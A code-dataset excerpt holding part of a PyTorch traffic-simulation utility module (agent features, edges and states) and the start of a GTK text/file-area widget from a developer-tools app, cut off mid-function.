dim=-1,\n )\n else:\n feature_veh = torch.cat((pos, vel, torch.cos(yaw), torch.sin(yaw)), dim=-1)\n\n state_veh = torch.cat((pos, vel, yaw), dim=-1)\n\n # pedestrians and animals\n if add_noise:\n pos_noise = torch.randn(pos.size(0), 1, 1, 2).to(pos.device) * 0.5\n yaw_noise = torch.randn(pos.size(0), 1, 1, 1).to(pos.device) * 0.1\n if pos.ndim == 5:\n pos_noise = pos_noise.unsqueeze(1)\n yaw_noise = yaw_noise.unsqueeze(1)\n ped_feature = torch.cat(\n (\n pos + pos_noise,\n vel,\n vel * torch.sin(yaw + yaw_noise),\n vel * torch.cos(yaw + yaw_noise),\n ),\n dim=-1,\n )\n else:\n ped_feature = torch.cat(\n (pos, vel, vel * torch.sin(yaw), vel * torch.cos(yaw)), dim=-1\n )\n state_ped = torch.cat((pos, vel * torch.cos(yaw), vel * torch.sin(yaw)), dim=-1)\n state = state_veh * veh_mask.view(\n [*raw_type.shape, 1, 1]\n ) + state_ped * ped_mask.view([*raw_type.shape, 1, 1])\n dyn_type += dynamics.DynType.DI * ped_mask\n\n feature = feature_veh * veh_mask.view(\n [*raw_type.shape, 1, 1]\n ) + ped_feature * ped_mask.view([*raw_type.shape, 1, 1])\n\n type_embedding = F.one_hot(raw_type, 16)\n\n if pos.ndim == 4:\n if lanes is not None:\n feature = torch.cat(\n (\n feature,\n type_embedding.unsqueeze(-2).repeat(1, 1, feature.size(2), 1),\n lanes[:, :, None, :].repeat(1, 1, feature.size(2), 1),\n ),\n dim=-1,\n )\n else:\n feature = torch.cat(\n (\n feature,\n type_embedding.unsqueeze(-2).repeat(1, 1, feature.size(2), 1),\n ),\n dim=-1,\n )\n\n elif pos.ndim == 5:\n if lanes is not None:\n feature = torch.cat(\n (\n feature,\n type_embedding.unsqueeze(-2).repeat(1, 1, 1, feature.size(-2), 1),\n lanes[:, :, None, None, :].repeat(\n 1, feature.size(1), 1, feature.size(2), 1\n ),\n ),\n dim=-1,\n )\n else:\n feature = torch.cat(\n (\n feature,\n type_embedding.unsqueeze(-2).repeat(1, 1, 1, feature.size(-2), 1),\n ),\n dim=-1,\n )\n feature = feature * mask.unsqueeze(-1)\n return feature, dyn_type, state\n\n\ndef batch_to_vectorized_feature(data_batch, dyn_list, step_time, algo_config):\n device = data_batch[\"history_positions\"].device\n raw_type = torch.cat(\n (data_batch[\"type\"].unsqueeze(1), data_batch[\"all_other_agents_types\"]),\n dim=1,\n ).type(torch.int64)\n extents = torch.cat(\n (\n data_batch[\"extent\"][..., :2].unsqueeze(1),\n torch.max(data_batch[\"all_other_agents_history_extents\"], dim=-2)[0],\n ),\n dim=1,\n )\n\n src_pos = torch.cat(\n (\n data_batch[\"history_positions\"].unsqueeze(1),\n data_batch[\"all_other_agents_history_positions\"],\n ),\n dim=1,\n )\n \"history position and yaw need to be flipped so that they go from past to recent\"\n src_pos = torch.flip(src_pos, dims=[-2])\n src_yaw = torch.cat(\n (\n data_batch[\"history_yaws\"].unsqueeze(1),\n data_batch[\"all_other_agents_history_yaws\"],\n ),\n dim=1,\n )\n src_yaw = torch.flip(src_yaw, dims=[-2])\n src_world_yaw = src_yaw + (\n data_batch[\"yaw\"]\n .view(-1, 1, 1, 1)\n .repeat(1, src_yaw.size(1), src_yaw.size(2), 1)\n ).type(torch.float)\n src_mask = torch.cat(\n (\n data_batch[\"history_availabilities\"].unsqueeze(1),\n data_batch[\"all_other_agents_history_availability\"],\n ),\n dim=1,\n ).bool()\n\n src_mask = torch.flip(src_mask, dims=[-1])\n # estimate velocity\n src_vel = dyn_list[dynamics.DynType.UNICYCLE].calculate_vel(\n src_pos, src_yaw, step_time, src_mask\n )\n\n src_vel[:, 0, -1] = torch.clip(\n data_batch[\"curr_speed\"].unsqueeze(-1),\n min=algo_config.vmin,\n max=algo_config.vmax,\n )\n if algo_config.vectorize_lane:\n src_lanes = torch.cat(\n (\n data_batch[\"ego_lanes\"].unsqueeze(1),\n data_batch[\"all_other_agents_lanes\"],\n ),\n dim=1,\n ).type(torch.float)\n src_lanes = torch.cat((\n src_lanes[...,0:2],\n torch.cos(src_lanes[...,2:3]),\n torch.sin(src_lanes[...,2:3]),\n src_lanes[...,-1:],\n ),dim=-1)\n src_lanes = src_lanes.view(*src_lanes.shape[:2], -1)\n else:\n src_lanes = None\n src, dyn_type, src_state = raw2feature(\n src_pos, src_vel, src_yaw, raw_type, src_mask, src_lanes\n )\n tgt_mask = torch.cat(\n (\n data_batch[\"target_availabilities\"].unsqueeze(1),\n data_batch[\"all_other_agents_future_availability\"],\n ),\n dim=1,\n ).bool()\n num = torch.arange(0, src_mask.shape[2]).view(1, 1, -1).to(src_mask.device)\n nummask = num * src_mask\n last_idx, _ = torch.max(nummask, dim=2)\n curr_state = torch.gather(\n src_state, 2, last_idx[..., None, None].repeat(1, 1, 1, 4)\n )\n\n tgt_pos = torch.cat(\n (\n data_batch[\"target_positions\"].unsqueeze(1),\n data_batch[\"all_other_agents_future_positions\"],\n ),\n dim=1,\n )\n tgt_yaw = torch.cat(\n (\n data_batch[\"target_yaws\"].unsqueeze(1),\n data_batch[\"all_other_agents_future_yaws\"],\n ),\n dim=1,\n )\n tgt_pos_yaw = torch.cat((tgt_pos, tgt_yaw), dim=-1)\n \n\n # curr_pos_yaw = torch.cat((curr_state[..., 0:2], curr_yaw), dim=-1)\n\n # tgt = tgt - curr_pos_yaw.repeat(1, 1, tgt.size(2), 1) * tgt_mask.unsqueeze(-1)\n\n\n return (\n src,\n dyn_type,\n src_state,\n src_pos,\n src_yaw,\n src_world_yaw,\n src_vel,\n raw_type,\n src_mask,\n src_lanes,\n extents,\n tgt_pos_yaw,\n tgt_mask,\n curr_state,\n )\n\ndef obtain_goal_state(tgt_pos_yaw,tgt_mask):\n num = torch.arange(0, tgt_mask.shape[2]).view(1, 1, -1).to(tgt_mask.device)\n nummask = num * tgt_mask\n last_idx, _ = torch.max(nummask, dim=2, keepdim=True)\n last_mask = nummask.ge(last_idx)\n \n goal_mask = tgt_mask*last_mask\n goal_pos_yaw = tgt_pos_yaw*goal_mask.unsqueeze(-1)\n return goal_pos_yaw[...,:2], goal_pos_yaw[...,2:], goal_mask\n\n\ndef batch_to_raw_all_agents(data_batch, step_time):\n raw_type = torch.cat(\n (data_batch[\"type\"].unsqueeze(1), data_batch[\"all_other_agents_types\"]),\n dim=1,\n ).type(torch.int64)\n\n src_pos = torch.cat(\n (\n data_batch[\"history_positions\"].unsqueeze(1),\n data_batch[\"all_other_agents_history_positions\"],\n ),\n dim=1,\n )\n # history position and yaw need to be flipped so that they go from past to recent\n src_pos = torch.flip(src_pos, dims=[-2])\n src_yaw = torch.cat(\n (\n data_batch[\"history_yaws\"].unsqueeze(1),\n data_batch[\"all_other_agents_history_yaws\"],\n ),\n dim=1,\n )\n src_yaw = torch.flip(src_yaw, dims=[-2])\n src_mask = torch.cat(\n (\n data_batch[\"history_availabilities\"].unsqueeze(1),\n data_batch[\"all_other_agents_history_availability\"],\n ),\n dim=1,\n ).bool()\n\n src_mask = torch.flip(src_mask, dims=[-1])\n\n extents = torch.cat(\n (\n data_batch[\"extent\"][..., :2].unsqueeze(1),\n torch.max(data_batch[\"all_other_agents_history_extents\"], dim=-2)[0],\n ),\n dim=1,\n )\n\n # estimate velocity\n src_vel = dynamics.Unicycle.calculate_vel(src_pos, src_yaw, step_time, src_mask)\n src_vel[:, 0, -1] = data_batch[\"curr_speed\"].unsqueeze(-1)\n\n return {\n \"history_positions\": src_pos,\n \"history_yaws\": src_yaw,\n \"curr_speed\": src_vel[:, :, -1, 0],\n \"raw_types\": raw_type,\n \"history_availabilities\": src_mask,\n \"extents\": extents,\n }\n\n\ndef batch_to_target_all_agents(data_batch):\n pos = torch.cat(\n (\n data_batch[\"target_positions\"].unsqueeze(1),\n data_batch[\"all_other_agents_future_positions\"],\n ),\n dim=1,\n )\n yaw = torch.cat(\n (\n data_batch[\"target_yaws\"].unsqueeze(1),\n data_batch[\"all_other_agents_future_yaws\"],\n ),\n dim=1,\n )\n avails = torch.cat(\n (\n data_batch[\"target_availabilities\"].unsqueeze(1),\n data_batch[\"all_other_agents_future_availability\"],\n ),\n dim=1,\n )\n\n extents = torch.cat(\n (\n data_batch[\"extent\"][..., :2].unsqueeze(1),\n torch.max(data_batch[\"all_other_agents_history_extents\"], dim=-2)[0],\n ),\n dim=1,\n )\n\n return {\n \"target_positions\": pos,\n \"target_yaws\": yaw,\n \"target_availabilities\": avails,\n \"extents\": extents\n }\n\n\ndef generate_edges(\n raw_type,\n extents,\n pos_pred,\n yaw_pred,\n edge_mask = None,\n):\n veh_mask = (raw_type >= 3) & (raw_type <= 13)\n ped_mask = (raw_type == 14) | (raw_type == 15)\n\n agent_mask = veh_mask | ped_mask\n edge_types = [\"VV\", \"VP\", \"PV\", \"PP\"]\n edges = {et: list() for et in edge_types}\n for i in range(agent_mask.shape[0]):\n agent_idx = torch.where(agent_mask[i] != 0)[0]\n edge_idx = torch.combinations(agent_idx, r=2)\n VV_idx = torch.where(\n veh_mask[i, edge_idx[:, 0]] & veh_mask[i, edge_idx[:, 1]]\n )[0]\n VP_idx = torch.where(\n veh_mask[i, edge_idx[:, 0]] & ped_mask[i, edge_idx[:, 1]]\n )[0]\n PV_idx = torch.where(\n ped_mask[i, edge_idx[:, 0]] & veh_mask[i, edge_idx[:, 1]]\n )[0]\n PP_idx = torch.where(\n ped_mask[i, edge_idx[:, 0]] & ped_mask[i, edge_idx[:, 1]]\n )[0]\n if pos_pred.ndim == 4:\n edges_of_all_types = torch.cat(\n (\n pos_pred[i, edge_idx[:, 0], :],\n yaw_pred[i, edge_idx[:, 0], :],\n pos_pred[i, edge_idx[:, 1], :],\n yaw_pred[i, edge_idx[:, 1], :],\n extents[i, edge_idx[:, 0]]\n .unsqueeze(-2)\n .repeat(1, pos_pred.size(-2), 1),\n extents[i, edge_idx[:, 1]]\n .unsqueeze(-2)\n .repeat(1, pos_pred.size(-2), 1),\n ),\n dim=-1,\n )\n edges[\"VV\"].append(edges_of_all_types[VV_idx])\n edges[\"VP\"].append(edges_of_all_types[VP_idx])\n edges[\"PV\"].append(edges_of_all_types[PV_idx])\n edges[\"PP\"].append(edges_of_all_types[PP_idx])\n elif pos_pred.ndim == 5:\n\n edges_of_all_types = torch.cat(\n (\n pos_pred[i, :, edge_idx[:, 0], :],\n yaw_pred[i, :, edge_idx[:, 0], :],\n pos_pred[i, :, edge_idx[:, 1], :],\n yaw_pred[i, :, edge_idx[:, 1], :],\n extents[i, None, edge_idx[:, 0], None, :].repeat(\n pos_pred.size(1), 1, pos_pred.size(-2), 1\n ),\n extents[i, None, edge_idx[:, 1], None, :].repeat(\n pos_pred.size(1), 1, pos_pred.size(-2), 1\n ),\n ),\n dim=-1,\n )\n edges[\"VV\"].append(edges_of_all_types[:, VV_idx])\n edges[\"VP\"].append(edges_of_all_types[:, VP_idx])\n edges[\"PV\"].append(edges_of_all_types[:, PV_idx])\n edges[\"PP\"].append(edges_of_all_types[:, PP_idx])\n if pos_pred.ndim == 4:\n for et, v in edges.items():\n edges[et] = torch.cat(v, dim=0)\n elif pos_pred.ndim == 5:\n for et, v in edges.items():\n edges[et] = torch.cat(v, dim=1)\n return edges\n\ndef gen_edges_masked(raw_type,\n extents,\n pred):\n\n B,Na,T = pred.shape[:3]\n\n veh_mask = (raw_type >= 3) & (raw_type <= 13)\n ped_mask = (raw_type == 14) | (raw_type == 15)\n\n edges = torch.zeros([B,Na,Na,T,10]).to(pred.device)\n edges[...,:3] = pred.unsqueeze(2)\n edges[...,3:6] = pred.unsqueeze(1)\n edges[...,6:8] = extents.unsqueeze(2).unsqueeze(3)\n edges[...,8:] = extents.unsqueeze(1).unsqueeze(3)\n self_mask = ~torch.eye(Na,dtype=bool,device=raw_type.device).unsqueeze(0)\n VV_mask = torch.logical_and(veh_mask.unsqueeze(2),veh_mask.unsqueeze(1))\n VV_mask = torch.logical_and(self_mask,VV_mask)\n\n VP_mask = torch.logical_and(veh_mask.unsqueeze(2),ped_mask.unsqueeze(1))\n VP_mask = torch.logical_and(self_mask,VP_mask)\n\n PV_mask = torch.logical_and(ped_mask.unsqueeze(2),veh_mask.unsqueeze(1))\n PV_mask = torch.logical_and(self_mask,PV_mask)\n\n PP_mask = torch.logical_and(ped_mask.unsqueeze(2),ped_mask.unsqueeze(1))\n PP_mask = torch.logical_and(self_mask,PP_mask)\n\n\n type_mask = dict(\n VV = VV_mask,\n VP = VP_mask,\n PV = PV_mask,\n PP = PP_mask\n )\n return edges,type_mask\n\n\ndef gen_ego_edges(ego_trajectories, agent_trajectories, ego_extents, agent_extents, raw_types):\n \"\"\"generate edges between ego trajectory samples and agent trajectories\n\n Args:\n ego_trajectories (torch.Tensor): [B,N,T,3]\n agent_trajectories (torch.Tensor): [B,A,T,3] or [B,N,A,T,3]\n ego_extents (torch.Tensor): [B,2]\n agent_extents (torch.Tensor): [B,A,2]\n raw_types (torch.Tensor): [B,A]\n Returns:\n edges (torch.Tensor): [B,N,A,T,10]\n type_mask (dict)\n \"\"\"\n B,N,T = ego_trajectories.shape[:3]\n A = agent_trajectories.shape[-3]\n\n veh_mask = (raw_types >= 3) & (raw_types <= 13)\n ped_mask = (raw_types == 14) | (raw_types == 15)\n\n edges = torch.zeros([B,N,A,T,10]).to(ego_trajectories.device)\n edges[...,:3] = ego_trajectories.unsqueeze(2).repeat(1,1,A,1,1)\n if agent_trajectories.ndim==4:\n edges[...,3:6] = agent_trajectories.unsqueeze(1).repeat(1,N,1,1,1)\n else:\n edges[...,3:6] = agent_trajectories\n edges[...,6:8] = ego_extents.reshape(B,1,1,1,2).repeat(1,N,A,T,1)\n edges[...,8:] = agent_extents.reshape(B,1,A,1,2).repeat(1,N,1,T,1)\n type_mask = {\"VV\":veh_mask,\"VP\":ped_mask}\n return edges,type_mask\n\n\ndef gen_EC_edges(ego_trajectories,agent_trajectories,ego_extents, agent_extents, raw_types,mask=None):\n \"\"\"generate edges between ego trajectory samples and agent trajectories\n\n Args:\n ego_trajectories (torch.Tensor): [B,A,T,3]\n agent_trajectories (torch.Tensor): [B,A,T,3]\n ego_extents (torch.Tensor): [B,2]\n agent_extents (torch.Tensor): [B,A,2]\n raw_types (torch.Tensor): [B,A]\n mask (optional, torch.Tensor): [B,A]\n Returns:\n edges (torch.Tensor): [B,N,A,T,10]\n type_mask (dict)\n \"\"\"\n\n B,A = ego_trajectories.shape[:2]\n T = ego_trajectories.shape[-2]\n\n veh_mask = (raw_types >= 3) & (raw_types <= 13)\n ped_mask = (raw_types == 14) | (raw_types == 15)\n\n \n if ego_trajectories.ndim==4:\n edges = torch.zeros([B,A,T,10]).to(ego_trajectories.device)\n edges[...,:3] = ego_trajectories\n edges[...,3:6] = agent_trajectories\n edges[...,6:8] = ego_extents.reshape(B,1,1,2).repeat(1,A,T,1)\n edges[...,8:] = agent_extents.unsqueeze(2).repeat(1,1,T,1)\n elif ego_trajectories.ndim==5:\n \n K = ego_trajectories.shape[2]\n edges = torch.zeros([B,A*K,T,10]).to(ego_trajectories.device)\n edges[...,:3] = TensorUtils.join_dimensions(ego_trajectories,1,3)\n edges[...,3:6] = agent_trajectories.repeat(1,K,1,1)\n edges[...,6:8] = ego_extents.reshape(B,1,1,2).repeat(1,A*K,T,1)\n edges[...,8:] = agent_extents.unsqueeze(2).repeat(1,K,T,1)\n veh_mask = veh_mask.tile(1,K)\n ped_mask = ped_mask.tile(1,K)\n if mask is not None:\n veh_mask = veh_mask*mask\n ped_mask = ped_mask*mask\n type_mask = {\"VV\":veh_mask,\"VP\":ped_mask}\n return edges,type_mask\n \n\ndef get_edges_from_batch(data_batch, ego_predictions=None, all_predictions=None):\n raw_type = torch.cat(\n (data_batch[\"type\"].unsqueeze(1), data_batch[\"all_other_agents_types\"]),\n dim=1,\n ).type(torch.int64)\n\n # Use predicted ego position to compute future box edges\n\n targets_all = batch_to_target_all_agents(data_batch)\n if ego_predictions is not None:\n targets_all[\"target_positions\"] [:, 0, :, :] = ego_predictions[\"positions\"]\n targets_all[\"target_yaws\"][:, 0, :, :] = ego_predictions[\"yaws\"]\n elif all_predictions is not None:\n targets_all[\"target_positions\"] = all_predictions[\"positions\"]\n targets_all[\"target_yaws\"] = all_predictions[\"yaws\"]\n else:\n raise ValueError(\"Please specify either ego prediction or all predictions\")\n\n pred_edges = generate_edges(\n raw_type, targets_all[\"extents\"],\n pos_pred=targets_all[\"target_positions\"],\n yaw_pred=targets_all[\"target_yaws\"]\n )\n return pred_edges\n\n\ndef get_last_available_index(avails):\n \"\"\"\n Args:\n avails (torch.Tensor): target availabilities [B, (A), T]\n\n Returns:\n last_indices (torch.Tensor): index of the last available frame\n \"\"\"\n num_frames = avails.shape[-1]\n inds = torch.arange(0, num_frames).to(avails.device) # [T]\n inds = (avails > 0).float() * inds # [B, (A), T] arange indices with unavailable indices set to 0\n last_inds = inds.max(dim=-1)[1] # [B, (A)] calculate the index of the last availale frame\n return last_inds\n\n\ndef get_current_states(batch: dict, dyn_type: dynamics.DynType) -> torch.Tensor:\n bs = batch[\"curr_speed\"].shape[0]\n if dyn_type == dynamics.DynType.BICYCLE:\n current_states = torch.zeros(bs, 6).to(batch[\"curr_speed\"].device) # [x, y, yaw, vel, dh, veh_len]\n current_states[:, 3] = batch[\"curr_speed\"].abs()\n current_states[:, [4]] = (batch[\"history_yaws\"][:, 0] - batch[\"history_yaws\"][:, 1]).abs()\n current_states[:, 5] = batch[\"extent\"][:, 0] # [veh_len]\n else:\n current_states = torch.zeros(bs, 4).to(batch[\"curr_speed\"].device) # [x, y, vel, yaw]\n current_states[:, 2] = batch[\"curr_speed\"]\n return current_states\n\n\ndef get_current_states_all_agents(batch: dict, step_time, dyn_type: dynamics.DynType) -> torch.Tensor:\n if batch[\"history_positions\"].ndim==3:\n state_all = batch_to_raw_all_agents(batch, step_time)\n else:\n state_all = batch\n bs, na = state_all[\"curr_speed\"].shape[:2]\n if dyn_type == dynamics.DynType.BICYCLE:\n current_states = torch.zeros(bs, na, 6).to(state_all[\"curr_speed\"].device) # [x, y, yaw, vel, dh, veh_len]\n current_states[:, :, :2] = state_all[\"history_positions\"][:, :, 0]\n current_states[:, :, 3] = state_all[\"curr_speed\"].abs()\n current_states[:, :, [4]] = (state_all[\"history_yaws\"][:, :, 0] - state_all[\"history_yaws\"][:, :, 1]).abs()\n current_states[:, :, 5] = state_all[\"extent\"][:, :, 0] # [veh_len]\n else:\n current_states = torch.zeros(bs, na, 4).to(state_all[\"curr_speed\"].device) # [x, y, vel, yaw]\n current_states[:, :, :2] = state_all[\"history_positions\"][:, :, 0]\n current_states[:, :, 2] = state_all[\"curr_speed\"]\n current_states[:,:,3:] = state_all[\"history_yaws\"][:,:,0]\n return current_states\n\n\ndef get_drivable_region_map(rasterized_map):\n return rasterized_map[..., -3, :, :] < 1.\n\n\ndef get_modality_shapes(cfg: ExperimentConfig):\n assert cfg.env.rasterizer.map_type == \"py_semantic\"\n num_channels = (cfg.algo.history_num_frames + 1) * 2 + 3\n h, w = cfg.env.rasterizer.raster_size\n return dict(image=(num_channels, h, w))","repo_name":"NVlabs/traffic-behavior-simulation","sub_path":"tbsim/utils/l5_utils.py","file_name":"l5_utils.py","file_ext":"py","file_size_in_byte":25947,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"39"} +{"seq_id":"29206611340","text":"from gi.repository import Gtk, Adw, GObject, Gio, GtkSource, Gdk, GLib\nfrom gettext import gettext as _\nfrom typing import List\nimport humanize\n\nfrom devtoolbox.utils import Utils\n\n\n@Gtk.Template(resource_path='/me/iepure/devtoolbox/ui/widgets/text_file_area.ui')\nclass TextFileArea(Adw.Bin):\n __gtype_name__ = \"TextFileArea\"\n\n # Template elements\n _name_lbl = Gtk.Template.Child()\n _spinner = Gtk.Template.Child()\n _spinner_separator = Gtk.Template.Child()\n _action_btn = Gtk.Template.Child()\n _action_btn_separator = Gtk.Template.Child()\n _view_btn = Gtk.Template.Child()\n _open_btn = Gtk.Template.Child()\n _save_btn = Gtk.Template.Child()\n _copy_btn = Gtk.Template.Child()\n _paste_btn = Gtk.Template.Child()\n _clear_btn = Gtk.Template.Child()\n _stack = Gtk.Template.Child()\n _textview = Gtk.Template.Child()\n _imageview = Gtk.Template.Child()\n _fileview = Gtk.Template.Child()\n _loading_lbl = Gtk.Template.Child()\n\n # GSettings\n _settings = Gio.Settings(schema_id=\"me.iepure.devtoolbox\")\n\n # Properties\n name = GObject.Property(type=str, default=\"\")\n show_spinner = GObject.Property(type=bool, default=False)\n show_view_btn = GObject.Property(type=bool, default=False)\n show_clear_btn = GObject.Property(type=bool, default=False)\n show_save_btn = GObject.Property(type=bool, default=False)\n show_copy_btn = GObject.Property(type=bool, default=False)\n show_open_btn = GObject.Property(type=bool, default=False)\n show_paste_btn = GObject.Property(type=bool, default=False)\n show_action_btn = GObject.Property(type=bool, default=False)\n action_btn_name = GObject.Property(type=str, default=\"\")\n text_editable = GObject.Property(type=bool, default=True)\n text_show_line_numbers = GObject.Property(type=bool, default=False)\n text_highlight_current_line = GObject.Property(type=bool, default=False)\n text_syntax_highlighting = GObject.Property(type=bool, default=False)\n text_language_highlight = GObject.Property(type=str, default=\"\")\n text_wrap_mode = GObject.Property(type=Gtk.WrapMode, default=Gtk.WrapMode.NONE)\n area_height = GObject.Property(type=int, default=200)\n use_default_text_extensions = GObject.Property(type=bool, default=False)\n use_default_image_extensions = GObject.Property(type=bool, default=False)\n use_all_files_extensions = GObject.Property(type=bool, default=False)\n use_custom_file_extensions = GObject.Property(type=bool, default=False)\n custom_file_extensions = GObject.Property(type=GObject.TYPE_STRV)\n loading_label = GObject.Property(type=str, default=_(\"Opening file...\"))\n allow_drag_and_drop = GObject.Property(type=bool, default=True)\n\n # Custom signals\n __gsignals__ = {\n \"action-clicked\": (GObject.SIGNAL_RUN_LAST, None, ()),\n \"text-changed\": (GObject.SIGNAL_RUN_LAST, None, ()),\n \"view-cleared\": (GObject.SIGNAL_RUN_LAST, None, ()),\n \"text-loaded\": (GObject.SIGNAL_RUN_LAST, None, ()),\n \"image-loaded\": (GObject.SIGNAL_RUN_LAST, None, ()),\n \"file-loaded\": (GObject.SIGNAL_RUN_LAST, None, ()),\n \"big-file\": (GObject.SIGNAL_RUN_LAST, None, ()),\n \"error\": (GObject.SIGNAL_RUN_LAST, None, (str,)),\n \"saved\": (GObject.SIGNAL_RUN_LAST, None, (str,)),\n }\n\n def __init__(self):\n super().__init__()\n\n self.set_property(\"css-name\", \"textfilearea\")\n\n # Set theme\n language = GtkSource.LanguageManager.get_default().get_language(self.text_language_highlight)\n if Adw.StyleManager.get_default().get_dark():\n style_scheme = GtkSource.StyleSchemeManager().get_default().get_scheme(\"Adwaita-dark\")\n else:\n style_scheme = GtkSource.StyleSchemeManager().get_default().get_scheme(\"Adwaita\")\n self._textview.get_buffer().set_language(language)\n self._textview.get_buffer().set_style_scheme(style_scheme)\n\n # Drag and drop\n content = Gdk.ContentFormats.new_for_gtype(Gdk.FileList)\n target = Gtk.DropTarget(formats=content, actions=Gdk.DragAction.COPY)\n target.connect('drop', self._on_dnd_drop)\n self._textview.add_controller(target)\n\n # Property binding\n self.bind_property(\"name\", self._name_lbl, \"label\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"show-spinner\", self._spinner, \"visible\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"show-spinner\", self._spinner_separator, \"visible\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"show-view-btn\", self._view_btn, \"visible\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"show-clear-btn\", self._clear_btn, \"visible\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"show-copy-btn\", self._copy_btn, \"visible\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"show-open-btn\", self._open_btn, \"visible\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"show-save-btn\", self._save_btn, \"visible\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"show-paste-btn\", self._paste_btn, \"visible\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"show-action-btn\", self._action_btn, \"visible\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"show-action-btn\", self._action_btn_separator, \"visible\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"action-btn-name\", self._action_btn, \"label\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"text-editable\", self._textview, \"editable\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"text-syntax-highlighting\", self._textview.get_buffer(), \"highlight-syntax\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"text-syntax-highlighting\", self._textview.get_buffer(), \"highlight-matching-brackets\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"text-show-line-numbers\", self._textview, \"show-line-numbers\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"text-highlight-current-line\", self._textview, \"highlight-current-line\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"text-wrap-mode\", self._textview, \"wrap-mode\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"area-height\", self._textview, \"height-request\", GObject.BindingFlags.SYNC_CREATE)\n self.bind_property(\"loading-label\", self._loading_lbl, \"label\", GObject.BindingFlags.SYNC_CREATE)\n self._spinner.bind_property(\"spinning\", self._spinner, \"visible\", GObject.BindingFlags.BIDIRECTIONAL)\n self._spinner.bind_property(\"visible\", self._spinner_separator, \"visible\", GObject.BindingFlags.BIDIRECTIONAL)\n self._action_btn.bind_property(\"visible\", self._action_btn_separator, \"visible\", GObject.BindingFlags.BIDIRECTIONAL)\n\n # Signal connection\n self._action_btn.connect(\"clicked\", self._on_action_clicked)\n self._view_btn.connect(\"clicked\", self._on_view_clicked)\n self._clear_btn.connect(\"clicked\", self._on_clear_clicked)\n self._copy_btn.connect(\"clicked\", self._on_copy_clicked)\n self._paste_btn.connect(\"clicked\", self._on_paste_clicked)\n self._open_btn.connect(\"clicked\", self._on_open_clicked)\n self._save_btn.connect(\"clicked\", self._on_save_clicked)\n self._textview.get_buffer().connect(\"changed\", self._on_text_changed)\n Adw.StyleManager.get_default().connect(\"notify::dark\", self._on_theme_changed)\n\n def _on_dnd_drop(self, drop_target:Gtk.DropTarget, value: Gdk.FileList, x:float, y:float, user_data:GObject.Object=None):\n self._spinner.set_visible(True)\n files: List[Gio.File] = value.get_files()\n if len(files) != 1:\n self.emit(\"error\", _(\"Cannot open more than one file\"))\n return\n self._open_file(files[0])\n self._spinner.set_visible(False)\n\n def _on_view_clicked(self, user_data:GObject.GPointer):\n app = Gio.Application.get_default()\n window = app.get_active_window()\n Gtk.show_uri(window, \"file://\" + self._fileview.get_file_path(), Gdk.CURRENT_TIME)\n\n def _on_action_clicked(self, user_data:GObject.GPointer):\n self.emit(\"action-clicked\")\n\n def _on_clear_clicked(self, user_data:GObject.GPointer):\n self._clear()\n self._open_btn.set_sensitive(True)\n self.emit(\"view-cleared\")\n\n def _on_copy_clicked(self, user_data:GObject.GPointer):\n text_buffer = self._textview.get_buffer()\n text = text_buffer.get_text(text_buffer.get_start_iter(), text_buffer.get_end_iter(), False)\n clipboard = Gdk.Display.get_clipboard(Gdk.Display.get_default())\n clipboard.set(text)\n self.set_visible_view(\"text-area\")\n\n def _on_paste_clicked(self, user_data:GObject.GPointer):\n text_buffer = self._textview.get_buffer()\n clipboard = Gdk.Display.get_clipboard(Gdk.Display.get_default())\n text_buffer.paste_clipboard(clipboard, None, True)\n self.set_visible_view(\"text-area\")\n\n def _on_open_clicked(self, user_data:GObject.GPointer):\n\n # Start loading animation and disable open button\n self._open_btn.set_sensitive(False)\n self.set_visible_view(\"loading\") # change view and save previous\n self.loading_lbl = _(\"Opening file...\")\n\n # Create a file chooser\n app = Gio.Application.get_default()\n window = app.get_active_window()\n self._native = Gtk.FileChooserNative(\n transient_for=window,\n title=_(\"Open File\"),\n action=Gtk.FileChooserAction.OPEN,\n accept_label=_(\"Open\"),\n cancel_label=_(\"Cancel\")\n )\n\n # File filters\n if self.use_all_files_extensions:\n all_files_filter = Gtk.FileFilter()\n all_files_filter.add_pattern(\"*\")\n all_files_filter.set_name(_(\"All files\"))\n self._native.add_filter(all_files_filter)\n\n if self.use_default_text_extensions and self.use_default_image_extensions:\n text_image_filter = Gtk.FileFilter()\n text_image_filter.add_mime_type(\"text/*\")\n text_image_filter.add_pixbuf_formats()\n text_image_filter.set_name(_(\"Text files and images\"))\n self._native.add_filter(text_image_filter)\n\n if self.use_default_text_extensions:\n text_file_filter = Gtk.FileFilter()\n text_file_filter.add_mime_type(\"text/*\")\n text_file_filter.set_name(_(\"Text files\"))\n self._native.add_filter(text_file_filter)\n\n if self.use_default_image_extensions:\n image_file_filter = Gtk.FileFilter()\n image_file_filter.add_pixbuf_formats()\n image_file_filter.set_name(_(\"Images\"))\n self._native.add_filter(image_file_filter)\n\n if self.use_custom_file_extensions:\n custom_file_filter = Gtk.FileFilter()\n for extension in self.custom_file_extensions:\n custom_file_filter.add_suffix(extension.lstrip().rstrip())\n custom_file_filter.set_name(_(\"Accepted files\"))\n self._native.add_filter(custom_file_filter)\n\n # Signals and show dialog\n self._native.connect(\"response\", self._on_open_response)\n self._native.show()\n\n def _on_open_response(self, dialog:Gtk.NativeDialog, response:int):\n if response == Gtk.ResponseType.ACCEPT:\n self._open_file(dialog.get_file())\n else:\n self._open_btn.set_sensitive(True)\n self._stack.set_visible_child_name(self._previous_view) # Restore previous view\n\n self._native = None\n\n def _open_file(self, file:Gio.File):\n file_path = file.peek_path()\n file_size = file.query_info(\"*\", 0, 